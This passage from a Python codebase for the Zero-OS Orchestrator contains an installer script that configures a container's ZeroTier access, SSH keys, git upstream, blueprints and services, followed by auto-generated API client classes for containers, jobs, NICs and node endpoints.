for k, v in env.items():
export = "export %s=%s\n" % (k, v)
cn.client.filesystem.write(fd, export.encode('utf-8'))
cn.client.filesystem.close(fd)
#
# waiting for zerotier
#
containeraddrs = []
print("[+] configuring zerotier-nodes access")
containeraddrs.append(self.tools.containerzt(cn, ztauthnodes, ztnetnodes))
if ztauth:
print("[+] configuring zerotier-orchestrator access")
containeraddrs.append(self.tools.containerzt(cn, ztauth, ztnet))
#
# install or generate ssh key
#
if sshkey:
print("[+] writing ssh private key")
fd = cn.client.filesystem.open("/root/.ssh/id_rsa", "w")
cn.client.filesystem.write(fd, sshkey.encode('utf-8'))
cn.client.filesystem.close(fd)
# extracting public key from private key
cn.client.bash("chmod 0600 /root/.ssh/id_rsa").get()
cn.client.bash("ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub").get()
else:
print("[+] no private ssh key provided, generating new keys")
cn.client.bash("ssh-keygen -f /root/.ssh/id_rsa -t rsa -N ''").get()
publickey = cn.client.bash("cat /root/.ssh/id_rsa.pub").get()
return {'address': containeraddrs, 'publickey': publickey.stdout.strip()}
def configure(self, upstream, email, organization):
"""
upstream: git upstream address of orchestrator repository
email: email address used for git and caddy certificates
organization: organization name ays should allow
"""
print("[+] configuring services")
cn = self.node.containers.get(self.ctname)
#
# configuring ays
#
print("[+] setting organization")
if not cn.client.filesystem.exists("/optvar/cfg"):
cn.client.filesystem.mkdir("/optvar/cfg")
source = cn.client.bash("cat /optvar/cfg/jumpscale9.toml").get()
config = toml.loads(source.stdout)
config['ays'] = {
'production': True,
'oauth': {
'jwt_key': "<KEY>",
'organization': organization,
}
}
fd = cn.client.filesystem.open("/optvar/cfg/jumpscale9.toml", "w")
cn.client.filesystem.write(fd, toml.dumps(config).encode('utf-8'))
cn.client.filesystem.close(fd)
#
# setting up git
#
print("[+] configuring git client")
cn.client.bash("git config --global user.name 'AYS System'").get()
cn.client.bash("git config --global user.email '%s'" % email).get()
#
# setting up upstream
#
print("[+] preparing upstream repository")
cn.client.filesystem.mkdir("/optvar/cockpit_repos")
host = self.tools.hostof(upstream)
print("[+] authorizing %s (port: %d)" % (host['host'], host['port']))
cn.client.bash("ssh-keyscan -p %d %s >> ~/.ssh/known_hosts" % (host['port'], host['host'])).get()
print("[+] cloning upstream repository")
print("[+] (please ensure the host have access (allows public key ?) to upstream repository)")
self.tools.waitsfor(cn, "git clone %s /tmp/upstream" % upstream)
resp = cn.client.bash("cd /tmp/upstream && git rev-parse HEAD").get()
print("[+] configuring upstream repository")
repository = "/optvar/cockpit_repos/orchestrator-server"
# upstream is empty, let's create a new repository
if resp.code != 0:
print("[+] git repository is empty, creating empty repository")
cn.client.bash("cd /tmp/upstream/ && git init").get()
cn.client.bash("cd /tmp/upstream/ && git remote add origin %s" % upstream).get()
print("[+] ensure ays repository default layout")
for directory in ["services", "actorTemplates", "actors", "blueprints"]:
target = "/tmp/upstream/%s" % directory
if not cn.client.filesystem.exists(target):
cn.client.bash("mkdir -p %s && touch %s/.keep" % (target, target)).get()
print("[+] commit initialization changes")
cn.client.bash("touch /tmp/upstream/.ays").get()
cn.client.bash("cd /tmp/upstream/ && git add .").get()
cn.client.bash("cd /tmp/upstream/ && git commit -m 'Initial ays commit'").get()
print("[+] moving to orchestrator repository")
# moving upstream to target cockpit repository, removing any previous one
cn.client.bash("rm -rf %s" % repository).get()
cn.client.bash("mv /tmp/upstream %s" % repository).get()
print("[+] pushing git files to upstream")
print("[+] (please ensure the public key is allowed on remote git repository)")
self.tools.waitsfor(cn, "cd %s && git push origin master" % repository)
return True
def blueprint_configuration(self, cluster_token):
"""
cluster_token: refreshable jwt token for the cluster, written into the
configuration blueprint as the 'jwt-token' value (next to '0-core-version')
"""
cn = self.node.containers.get(self.ctname)
#
# configuration.bp
#
print("[+] building configuration blueprint")
source = cn.client.bash("cat %s/configuration.yaml" % self.templates).get()
config = yaml.safe_load(source.stdout)
# configuring blueprint
for item in config['configuration__main']['configurations']:
if item['key'] == '0-core-version':
item['value'] = self.core_version
if item['key'] == 'jwt-token':
item['value'] = cluster_token
blueprint = "/optvar/cockpit_repos/orchestrator-server/blueprints/configuration.bp"
fd = cn.client.filesystem.open(blueprint, "w")
cn.client.filesystem.write(fd, yaml.dump(config).encode('utf-8'))
cn.client.filesystem.close(fd)
return True
def blueprint_network(self, network, vlan, cidr):
"""
network: network type (g8, switchless, packet)
vlan and cidr: arguments for the g8 and switchless setups
Note: the network value is not verified; please ensure the value passed
is valid, otherwise the behavior is undefined (crash)
"""
cn = self.node.containers.get(self.ctname)
#
# network.bp
#
print("[+] building network blueprint")
targets = {
'g8': 'zero-os',
'switchless': 'switchless'
}
source = cn.client.bash("cat %s/network-%s.yaml" % (self.templates, network)).get()
netconfig = yaml.safe_load(source.stdout)
if network in ['g8', 'switchless']:
key = 'network.%s__storage' % targets[network]
netconfig[key]['vlanTag'] = int(vlan)
netconfig[key]['cidr'] = cidr
if network in ['packet']:
# there is nothing to do, but we keep the code
# to make it explicit that we intentionally do nothing
pass
blueprint = "/optvar/cockpit_repos/orchestrator-server/blueprints/network.bp"
fd = cn.client.filesystem.open(blueprint, "w")
cn.client.filesystem.write(fd, yaml.dump(netconfig).encode('utf-8'))
cn.client.filesystem.close(fd)
return True
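# Illustrative effect (example values only): blueprint_network("g8", "101",
# "192.168.58.0/24") loads network-g8.yaml, sets vlanTag: 101 and
# cidr: "192.168.58.0/24" under network.zero-os__storage, and writes the result
# to blueprints/network.bp in the cockpit repository.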
def blueprint_bootstrap(self, znetid, ztoken):
"""
znetid: zerotier network id of the nodes
ztoken: zerotier token used to manage the nodes network
"""
cn = self.node.containers.get(self.ctname)
#
# bootstrap.bp
#
print("[+] building bootstrap blueprint")
source = cn.client.bash("cat %s/bootstrap.yaml" % self.templates).get()
bstrapconfig = yaml.safe_load(source.stdout)
bstrapconfig['bootstrap.zero-os__grid1']['zerotierNetID'] = znetid
bstrapconfig['bootstrap.zero-os__grid1']['zerotierToken'] = ztoken
blueprint = "/optvar/cockpit_repos/orchestrator-server/blueprints/bootstrap.bp"
fd = cn.client.filesystem.open(blueprint, "w")
cn.client.filesystem.write(fd, yaml.dump(bstrapconfig).encode('utf-8'))
cn.client.filesystem.close(fd)
return True
def starter(self, email, organization, orchjwt):
jobs = {}
cn = self.node.containers.get(self.ctname)
running = self.running_processes(cn)
if len(running) == 3:
print("[+] all processes already running")
return
if 'ays' not in running:
print("[+] starting ays")
arguments = [
'python3',
'main.py',
'--host 127.0.0.1',
'--port 5000',
'--log info'
]
jobs['ays'] = cn.client.system(" ".join(arguments), dir='/opt/code/github/jumpscale/ays9')
if 'orchestrator' not in running:
print("[+] starting 0-orchestrator")
arguments = [
'/usr/local/bin/orchestratorapiserver',
'--bind localhost:8080',
'--ays-url http://127.0.0.1:5000',
'--ays-repo orchestrator-server',
'--org "%s"' % organization,
'--jwt "%s"' % orchjwt
]
jobs['orchestrator'] = cn.client.system(" ".join(arguments))
if 'caddy' not in running:
caddyfile = """
:443 {
proxy / localhost:8080
tls self_signed
}
:80 {
proxy / localhost:8080
}
"""
print("[+] starting caddy")
cn.client.filesystem.mkdir('/etc/caddy')
fd = cn.client.filesystem.open("/etc/caddy/Caddyfile", "w")
cn.client.filesystem.write(fd, caddyfile.encode('utf-8'))
cn.client.filesystem.close(fd)
arguments = [
'/usr/local/bin/caddy',
'-agree',
'-email %s' % email,
'-conf /etc/caddy/Caddyfile',
'-quic'
]
jobs['caddy'] = cn.client.system(" ".join(arguments))
print("[+] all processes started")
def deploy(self, jwt):
print("[+] deploying blueprints")
cn = self.node.containers.get(self.ctname)
repository = "/optvar/cockpit_repos/orchestrator-server"
blueprints = ["configuration.bp", "network.bp", "bootstrap.bp"]
environ = {'JWT': jwt}
print("[+] waiting for ays to boot")
status = 'ERROR'
while status != 'SUCCESS':
reply = cn.client.system("ays repo list", env=environ).get()
status = reply.state
print("[+] ays ready, executing blueprints")
for blueprint in blueprints:
print("[+] executing: %s" % blueprint)
x = cn.client.system("ays blueprint %s" % blueprint, dir=repository, env=environ).get()
return True
def running_processes(self, cn):
running = set()
for ps in cn.client.process.list():
if ps['cmdline'].find("caddy") != -1:
running.add('caddy')
if ps['cmdline'].find("orchestratorapiserver") != -1:
running.add('orchestrator')
if ps['cmdline'].find("/opt/jumpscale9/bin/python3 main.py") != -1:
running.add('ays')
return running
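# e.g. running_processes(cn) may return {'ays', 'caddy'} while the
# orchestratorapiserver process is not running yet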
def validate(self, ztauthorizer, zt_network):
if not ztauthorizer.validate(zt_network):
print("[-] error: cannot validate zerotier network %s" % zt_network)
print("[-] error: incorrect token provided, abording")
sys.exit(1)
"""
You can simply extend this class and implement these hooks.
This allows you to customize the setup.
"""
def pre_prepare(self):
pass
def post_prepare(self):
pass
def pre_configure(self):
pass
def post_configure(self):
pass
def pre_starter(self):
pass
def post_starter(self):
pass
if __name__ == "__main__":
print("[+] ================================")
print("[+] == Zero-OS Orchestrator Setup ==")
print("[+] ================================")
print("[+]")
installer = OrchestratorInstaller()
parser = argparse.ArgumentParser(description='Zero-OS Orchestrator Setup')
parser.add_argument('--host', type=str, help='remote Zero-OS server (address or hostname)', required=True)
parser.add_argument('--host-jwt', type=str, help='(optional) iyo jwt to use to connect the host')
parser.add_argument('--host-iyo-organization', type=str, help='(optional) iyo organization to generate host-jwt')
parser.add_argument('--host-iyo-client-id', type=str, help='(optional) iyo client-id to generate host-jwt')
parser.add_argument('--host-iyo-client-secret', type=str, help='(optional) iyo client-secret to generate host-jwt')
parser.add_argument('--orchestrator-container-flist', type=str, help='containers flist base image')
parser.add_argument('--orchestrator-container-name', type=str, help='container deployment name', default="orchestrator")
parser.add_argument('--orchestrator-iyo-organization', type=str, help='itsyou.online organization of ays', required=True)
parser.add_argument('--orchestrator-zt-net', type=str, help='zerotier network id of the container', required=True)
parser.add_argument('--orchestrator-zt-token', type=str, help='(optional) zerotier api token to auto-authorize orchestrator')
parser.add_argument('--orchestrator-git-repo', type=str, help='remote upstream git address', required=True)
parser.add_argument('--orchestrator-git-email', type=str, help='email used by caddy for certificates (default: <EMAIL>)', default="<EMAIL>")
parser.add_argument('--orchestrator-git-ssh-key', type=str, help='ssh private key filename (need to be passphrase less)')
parser.add_argument('--cluster-jwt', type=str, help='refreshable jwt token with (for orchestrator api)')
parser.add_argument('--cluster-iyo-organization', type=str, help='itsyou.online organization for cluster-jwt generator')
parser.add_argument('--cluster-iyo-client-id', type=str, help='itsyou.online client-id for cluster-jwt generator')
parser.add_argument('--cluster-iyo-client-secret', type=str, help='itsyou.online client-secret for cluster-jwt generator')
parser.add_argument('--cluster-backend-network-type', type=str, help='network type: g8, switchless, packet', required=True)
parser.add_argument('--cluster-backend-network-vlan', type=str, help='g8/switchless only: vlan id')
parser.add_argument('--cluster-backend-network-cidr', type=str, help='g8/switchless only: cidr address')
parser.add_argument('--cluster-management-zt-net', type=str, help='zerotier-network id of the cluster-nodes', required=True)
parser.add_argument('--cluster-management-zt-token', type=str, help='zerotier-token to manage the cluster-nodes', required=True)
parser.add_argument('--dry-run', help='only shows arguments summary, tokens and tests status (no install)', action="store_true")
args = parser.parse_args()
#
# obvious and fast argument checking
#
print("[+] preliminary arguments verification")
if args.orchestrator_container_flist:
installer.flist = args.orchestrator_container_flist
# checking which host authentication method was provided
host_auth_method = "jwt" if args.host_jwt else "iyo"
if host_auth_method == "iyo":
# jwt is not set, check whether any iyo credentials are set
if not args.host_iyo_organization and not args.host_iyo_client_id and not args.host_iyo_client_secret:
# no iyo set and no jwt token set
# we assume there is no password protection on host
host_auth_method = "unprotected"
else:
# some iyo arguments were given, let's check whether all of them are present
if not args.host_iyo_organization or not args.host_iyo_client_id or not args.host_iyo_client_secret:
print("[-] error: auth: no --host-jwt provided and incomplete --host-iyo-xxx arguments")
print("[-] error: auth: please provide a jwt or all iyo arguments")
sys.exit(1)
# checking which cluster authentication method was provided
cluster_auth_method = "jwt" if args.cluster_jwt else "iyo"
if cluster_auth_method == "iyo":
# we don't have jwt for cluster so we need to generate it
# checking if we have all required argument for that
if not args.cluster_iyo_organization or not args.cluster_iyo_client_id or not args.cluster_iyo_client_secret:
print("[-] error: auth: no --cluster-jwt provided and incomplete --cluster-iyo-xxx arguments")
print("[-] error: auth: please provide a jwt or all iyo arguments")
sys.exit(1)
# checking cluster backend network validity
if args.cluster_backend_network_type not in ['g8', 'switchless', 'packet']:
print("[-] error: network: invalid network type '%s'" % args.cluster_backend_network_type)
sys.exit(1)
if args.cluster_backend_network_type in ['g8', 'switchless']:
if not args.cluster_backend_network_vlan or not args.cluster_backend_network_cidr:
print("[-] error: network %s: vlan and cird required" % args.cluster_backend_network_type)
sys.exit(1)
# checking upstream ssh key validity if provided
if installer.tools.ssh.localkeys() == "" and not args.orchestrator_git_ssh_key:
print("[-] error: ssh-agent: no keys found on ssh-agent and no ssh private key specified")
print("[-] error: ssh-agent: you need at least one of them")
sys.exit(1)
sshkey = None
if args.orchestrator_git_ssh_key:
sshkey = installer.tools.ssh.loadkey(args.orchestrator_git_ssh_key)
if not installer.tools.ssh.validkey(sshkey):
print("[-] error: ssh-key: invalid ssh key file")
sys.exit(1)
if installer.tools.ssh.encryptedkey(sshkey):
print("[-] error: ssh-key: private key encrypted")
print("[-] error: ssh-key: you need to provided a passphrase-less key")
sys.exit(1)
#
# arguments syntax looks okay, let's show a small summary
#
print("[+]")
print("[+] -- global -----------------------------------------------------")
print("[+] remote server : %s" % args.host)
print("[+] authentification : %s" % host_auth_method)
print("[+] iyo organization : %s" % args.host_iyo_organization)
print("[+] iyo client-id : %s" % args.host_iyo_client_id)
print("[+] iyo client-secret : %s" % ("[ok-hidden]" if args.host_iyo_client_secret else "None"))
print("[+]")
print("[+] -- zerotier ---------------------------------------------------")
print("[+] orchestrator network : %s" % args.orchestrator_zt_net)
print("[+] orchestrator token : %s" % ("[ok-hidden]" if args.orchestrator_zt_token else "None"))
print("[+] cluster nodes network: %s" % args.cluster_management_zt_net)
print("[+] cluster nodes token : %s" % ("[ok-hidden]" if args.cluster_management_zt_token else "None"))
print("[+]")
print("[+] -- orchestrator -----------------------------------------------")
print("[+] container flist url : %s" % installer.flist)
print("[+] container name : %s" % args.orchestrator_container_name)
print("[+] iyo organization : %s" % args.orchestrator_iyo_organization)
print("[+]")
print("[+] -- upstream ---------------------------------------------------")
print("[+] ssh private key : %s" % args.orchestrator_git_ssh_key)
print("[+] upstream git email : %s" % args.orchestrator_git_email)
print("[+] upstream repository : %s" % args.orchestrator_git_repo)
print("[+]")
print("[+] -- cluster ----------------------------------------------------")
print("[+] refreshable jwt : %s" % args.cluster_jwt)
print("[+] iyo organization : %s" % args.cluster_iyo_organization)
print("[+] iyo client-id (jwt) : %s" % args.cluster_iyo_client_id)
print("[+] iyo client-secret : %s" % ("[ok-hidden]" if args.cluster_iyo_client_secret else "None"))
print("[+]")
print("[+] -- network ----------------------------------------------------")
print("[+] backend network set : %s" % args.cluster_backend_network_type)
print("[+] backend vlan-id : %s" % args.cluster_backend_network_vlan)
print("[+] backend address cidr: %s" % args.cluster_backend_network_cidr)
print("[+]")
print("[+] ===============================================================")
print("[+]")
# print("[+] -- notice -----------------------------------------------------")
# print("[-] take some time to review summary")
# print("[+] setup will continue in 5 seconds, press CTRL+C now to cancel")
# time.sleep(5)
#
# now let's validate the arguments we can check upfront
# this reduces the risk of unexpected behavior during deployment
# caused by an incorrect token, credentials and so on
#
print("[+] preliminary checks")
#
# testing zerotier tokens
#
print("[+] checking zerotier token for network: %s" % args.cluster_management_zt_net)
zt_auth_cluster = ZerotierAuthorizer(args.cluster_management_zt_token)
installer.validate(zt_auth_cluster, args.cluster_management_zt_net)
zt_auth_container = None
if args.orchestrator_zt_token:
print("[+] checking zerotier token for network: %s" % args.orchestrator_zt_net)
zt_auth_container = ZerotierAuthorizer(args.orchestrator_zt_token)
installer.validate(zt_auth_container, args.orchestrator_zt_net)
#
# generating jwt tokens if not provided
#
if host_auth_method == "iyo":
print("[+] generating host-jwt based on iyo-arguments")
args.host_jwt = installer.tools.generatetoken(
args.host_iyo_client_id,
args.host_iyo_client_secret,
args.host_iyo_organization,
3600
)
if cluster_auth_method == "iyo":
print("[+] generating cluster-jwt based on iyo-arguments")
args.cluster_jwt = installer.tools.generatetoken(
args.cluster_iyo_client_id,
args.cluster_iyo_client_secret,
args.cluster_iyo_organization,
3600
)
#
# checking validity of the tokens (even if we generated them)
# a jwt can be granted but not contain the requested organization
# if the user is not a member of that organization; we check now so
# we can avoid errors later
#
if args.host_jwt:
print("[+] parsing provided (or generated) host-jwt")
host_jwt = OrchestratorJWT(args.host_jwt)
# did we generate it ourselves
if args.host_iyo_organization:
# is the user part of the organization
if host_jwt.organization() != args.host_iyo_organization:
print("[-] error: host-jwt: user is not part of the organization: %s" % args.host_iyo_organization)
sys.exit(1)
if not host_jwt.isValid():
print("[-] error: host-jwt: token is expired")
sys.exit(1)
print("[+] parsing provided (or generated) cluster-jwt")
cluster_jwt = OrchestratorJWT(args.cluster_jwt)
if cluster_auth_method == "jwt":
# user provided a jwt, extracting organization from it
args.cluster_iyo_organization = cluster_jwt.organization()
# we know the next check will always pass, but let's keep
# the code generic
if cluster_jwt.organization() != args.cluster_iyo_organization:
print("[-] error: cluster-jwt: user is not part of the organization: %s" % args.cluster_iyo_organization)
sys.exit(1)
if not cluster_jwt.isValid():
print("[-] error: host-jwt: token is expired")
sys.exit(1)
print("[+]")
print("[+] -- jwt tokens -------------------------------------------------")
if args.host_jwt:
print("[+] host jwt organization: %s" % host_jwt.organization())
print("[+] cluster jwt organization: %s" % cluster_jwt.organization())
print("[+]")
print("[+] == wouhou ==")
if args.dry_run:
print("[+] everything looks correct, you asked a dry-run, nothing more do do")
sys.exit(0)
print("[+] everything looks correct, let's go installing all of this !")
print("[+]")
#
# everything looks fine for now
# starting the real deployment
#
print("[+] initializing connection")
node = installer.connector(args.host, args.host_jwt)
print("[+] hook: pre-prepare")
installer.pre_prepare()
print("[+] hook: prepare")
prepared = installer.prepare(
args.orchestrator_container_name,
args.orchestrator_zt_net,
args.cluster_management_zt_net,
sshkey,
zt_auth_cluster,
zt_auth_container
)
print("[+] ==================================================")
print("[+] container address: %s" % prepared['address'])
print("[+] container key: %s" % prepared['publickey'])
print("[+] ==================================================")
print("[+] hook: post-prepare")
installer.post_prepare()
print("[+] hook: pre-configure")
installer.pre_configure()
print("[+] hook: configure")
installer.configure(
args.orchestrator_git_repo,
args.orchestrator_git_email,
args.cluster_iyo_organization
)
installer.blueprint_configuration(args.cluster_jwt)
installer.blueprint_network(
args.cluster_backend_network_type,
args.cluster_backend_network_vlan,
args.cluster_backend_network_cidr
)
installer.blueprint_bootstrap(
args.cluster_management_zt_net,
args.cluster_management_zt_token
)
print("[+] hook: post-configure")
installer.post_configure()
print("[+] hook: pre-starter")
installer.pre_starter()
print("[+] hook: starter")
installer.starter(
args.orchestrator_git_email,
args.orchestrator_iyo_organization,
args.cluster_jwt
)
installer.deploy(args.cluster_jwt)
print("[+] hook: post-starter")
installer.post_starter()
print("[+] orchestrator deployed, have a nice day")
```
#### File: orchestrator/client/ContainerNIC.py
```python
from .ContainerNICconfig import ContainerNICconfig
from .EnumContainerNICStatus import EnumContainerNICStatus
from .EnumContainerNICType import EnumContainerNICType
from . import client_support
class ContainerNIC(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(id, status, type, config=None, hwaddr=None, name=None, token=None):
"""
:type config: ContainerNICconfig
:type hwaddr: str
:type id: str
:type name: str
:type status: EnumContainerNICStatus
:type token: str
:type type: EnumContainerNICType
:rtype: ContainerNIC
"""
return ContainerNIC(
config=config,
hwaddr=hwaddr,
id=id,
name=name,
status=status,
token=token,
type=type,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'ContainerNIC'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'config'
val = data.get(property_name)
if val is not None:
datatypes = [ContainerNICconfig]
try:
self.config = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'hwaddr'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.hwaddr = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'id'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.id = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'name'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.name = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'status'
val = data.get(property_name)
if val is not None:
datatypes = [EnumContainerNICStatus]
try:
self.status = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'token'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.token = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
property_name = 'type'
val = data.get(property_name)
if val is not None:
datatypes = [EnumContainerNICType]
try:
self.type = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/Job.py
```python
from . import client_support
class Job(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(id, logLevels, maxRestart, maxTime, queue, recurringPeriod, statsInterval, tags):
"""
:type id: str
:type logLevels: list[int]
:type maxRestart: int
:type maxTime: int
:type queue: str
:type recurringPeriod: int
:type statsInterval: int
:type tags: str
:rtype: Job
"""
return Job(
id=id,
logLevels=logLevels,
maxRestart=maxRestart,
maxTime=maxTime,
queue=queue,
recurringPeriod=recurringPeriod,
statsInterval=statsInterval,
tags=tags,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'Job'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'id'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.id = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'logLevels'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.logLevels = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'maxRestart'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.maxRestart = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'maxTime'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.maxTime = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'queue'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.queue = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'recurringPeriod'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.recurringPeriod = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'statsInterval'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.statsInterval = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'tags'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.tags = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/NicInfo.py
```python
from . import client_support
class NicInfo(object):
"""
auto-generated. don't touch.
"""
@staticmethod
def create(addrs, flags, hardwareaddr, mtu, name):
"""
:type addrs: list[str]
:type flags: list[str]
:type hardwareaddr: str
:type mtu: int
:type name: str
:rtype: NicInfo
"""
return NicInfo(
addrs=addrs,
flags=flags,
hardwareaddr=hardwareaddr,
mtu=mtu,
name=name,
)
def __init__(self, json=None, **kwargs):
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'NicInfo'
create_error = '{cls}: unable to create {prop} from value: {val}: {err}'
required_error = '{cls}: missing required property {prop}'
data = json or kwargs
property_name = 'addrs'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.addrs = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'flags'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.flags = client_support.list_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'hardwareaddr'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.hardwareaddr = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'mtu'
val = data.get(property_name)
if val is not None:
datatypes = [int]
try:
self.mtu = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
property_name = 'name'
val = data.get(property_name)
if val is not None:
datatypes = [str]
try:
self.name = client_support.val_factory(val, datatypes)
except ValueError as err:
raise ValueError(create_error.format(cls=class_name, prop=property_name, val=val, err=err))
else:
raise ValueError(required_error.format(cls=class_name, prop=property_name))
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
```
#### File: orchestrator/client/nodes_service.py
```python
class NodesService:
def __init__(self, client):
self.client = client
def DeleteBridge(self, bridgeid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Remove bridge
It is method for DELETE /nodes/{nodeid}/bridges/{bridgeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges/"+bridgeid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetBridge(self, bridgeid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get bridge details
It is method for GET /nodes/{nodeid}/bridges/{bridgeid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges/"+bridgeid
return self.client.get(uri, None, headers, query_params, content_type)
def ListBridges(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List bridges
It is method for GET /nodes/{nodeid}/bridges
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateBridge(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Creates a new bridge
It is method for POST /nodes/{nodeid}/bridges
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/bridges"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerCPUInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all CPUs in the container
It is method for GET /nodes/{nodeid}/containers/{containername}/cpus
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/cpus"
return self.client.get(uri, None, headers, query_params, content_type)
def FileDelete(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete file from container
It is method for DELETE /nodes/{nodeid}/containers/{containername}/filesystem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/filesystem"
return self.client.delete(uri, data, headers, query_params, content_type)
def FileDownload(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Download file from container
It is method for GET /nodes/{nodeid}/containers/{containername}/filesystem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/filesystem"
return self.client.get(uri, None, headers, query_params, content_type)
def FileUpload(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Upload file to container
It is method for POST /nodes/{nodeid}/containers/{containername}/filesystem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/filesystem"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerOSInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of the container OS
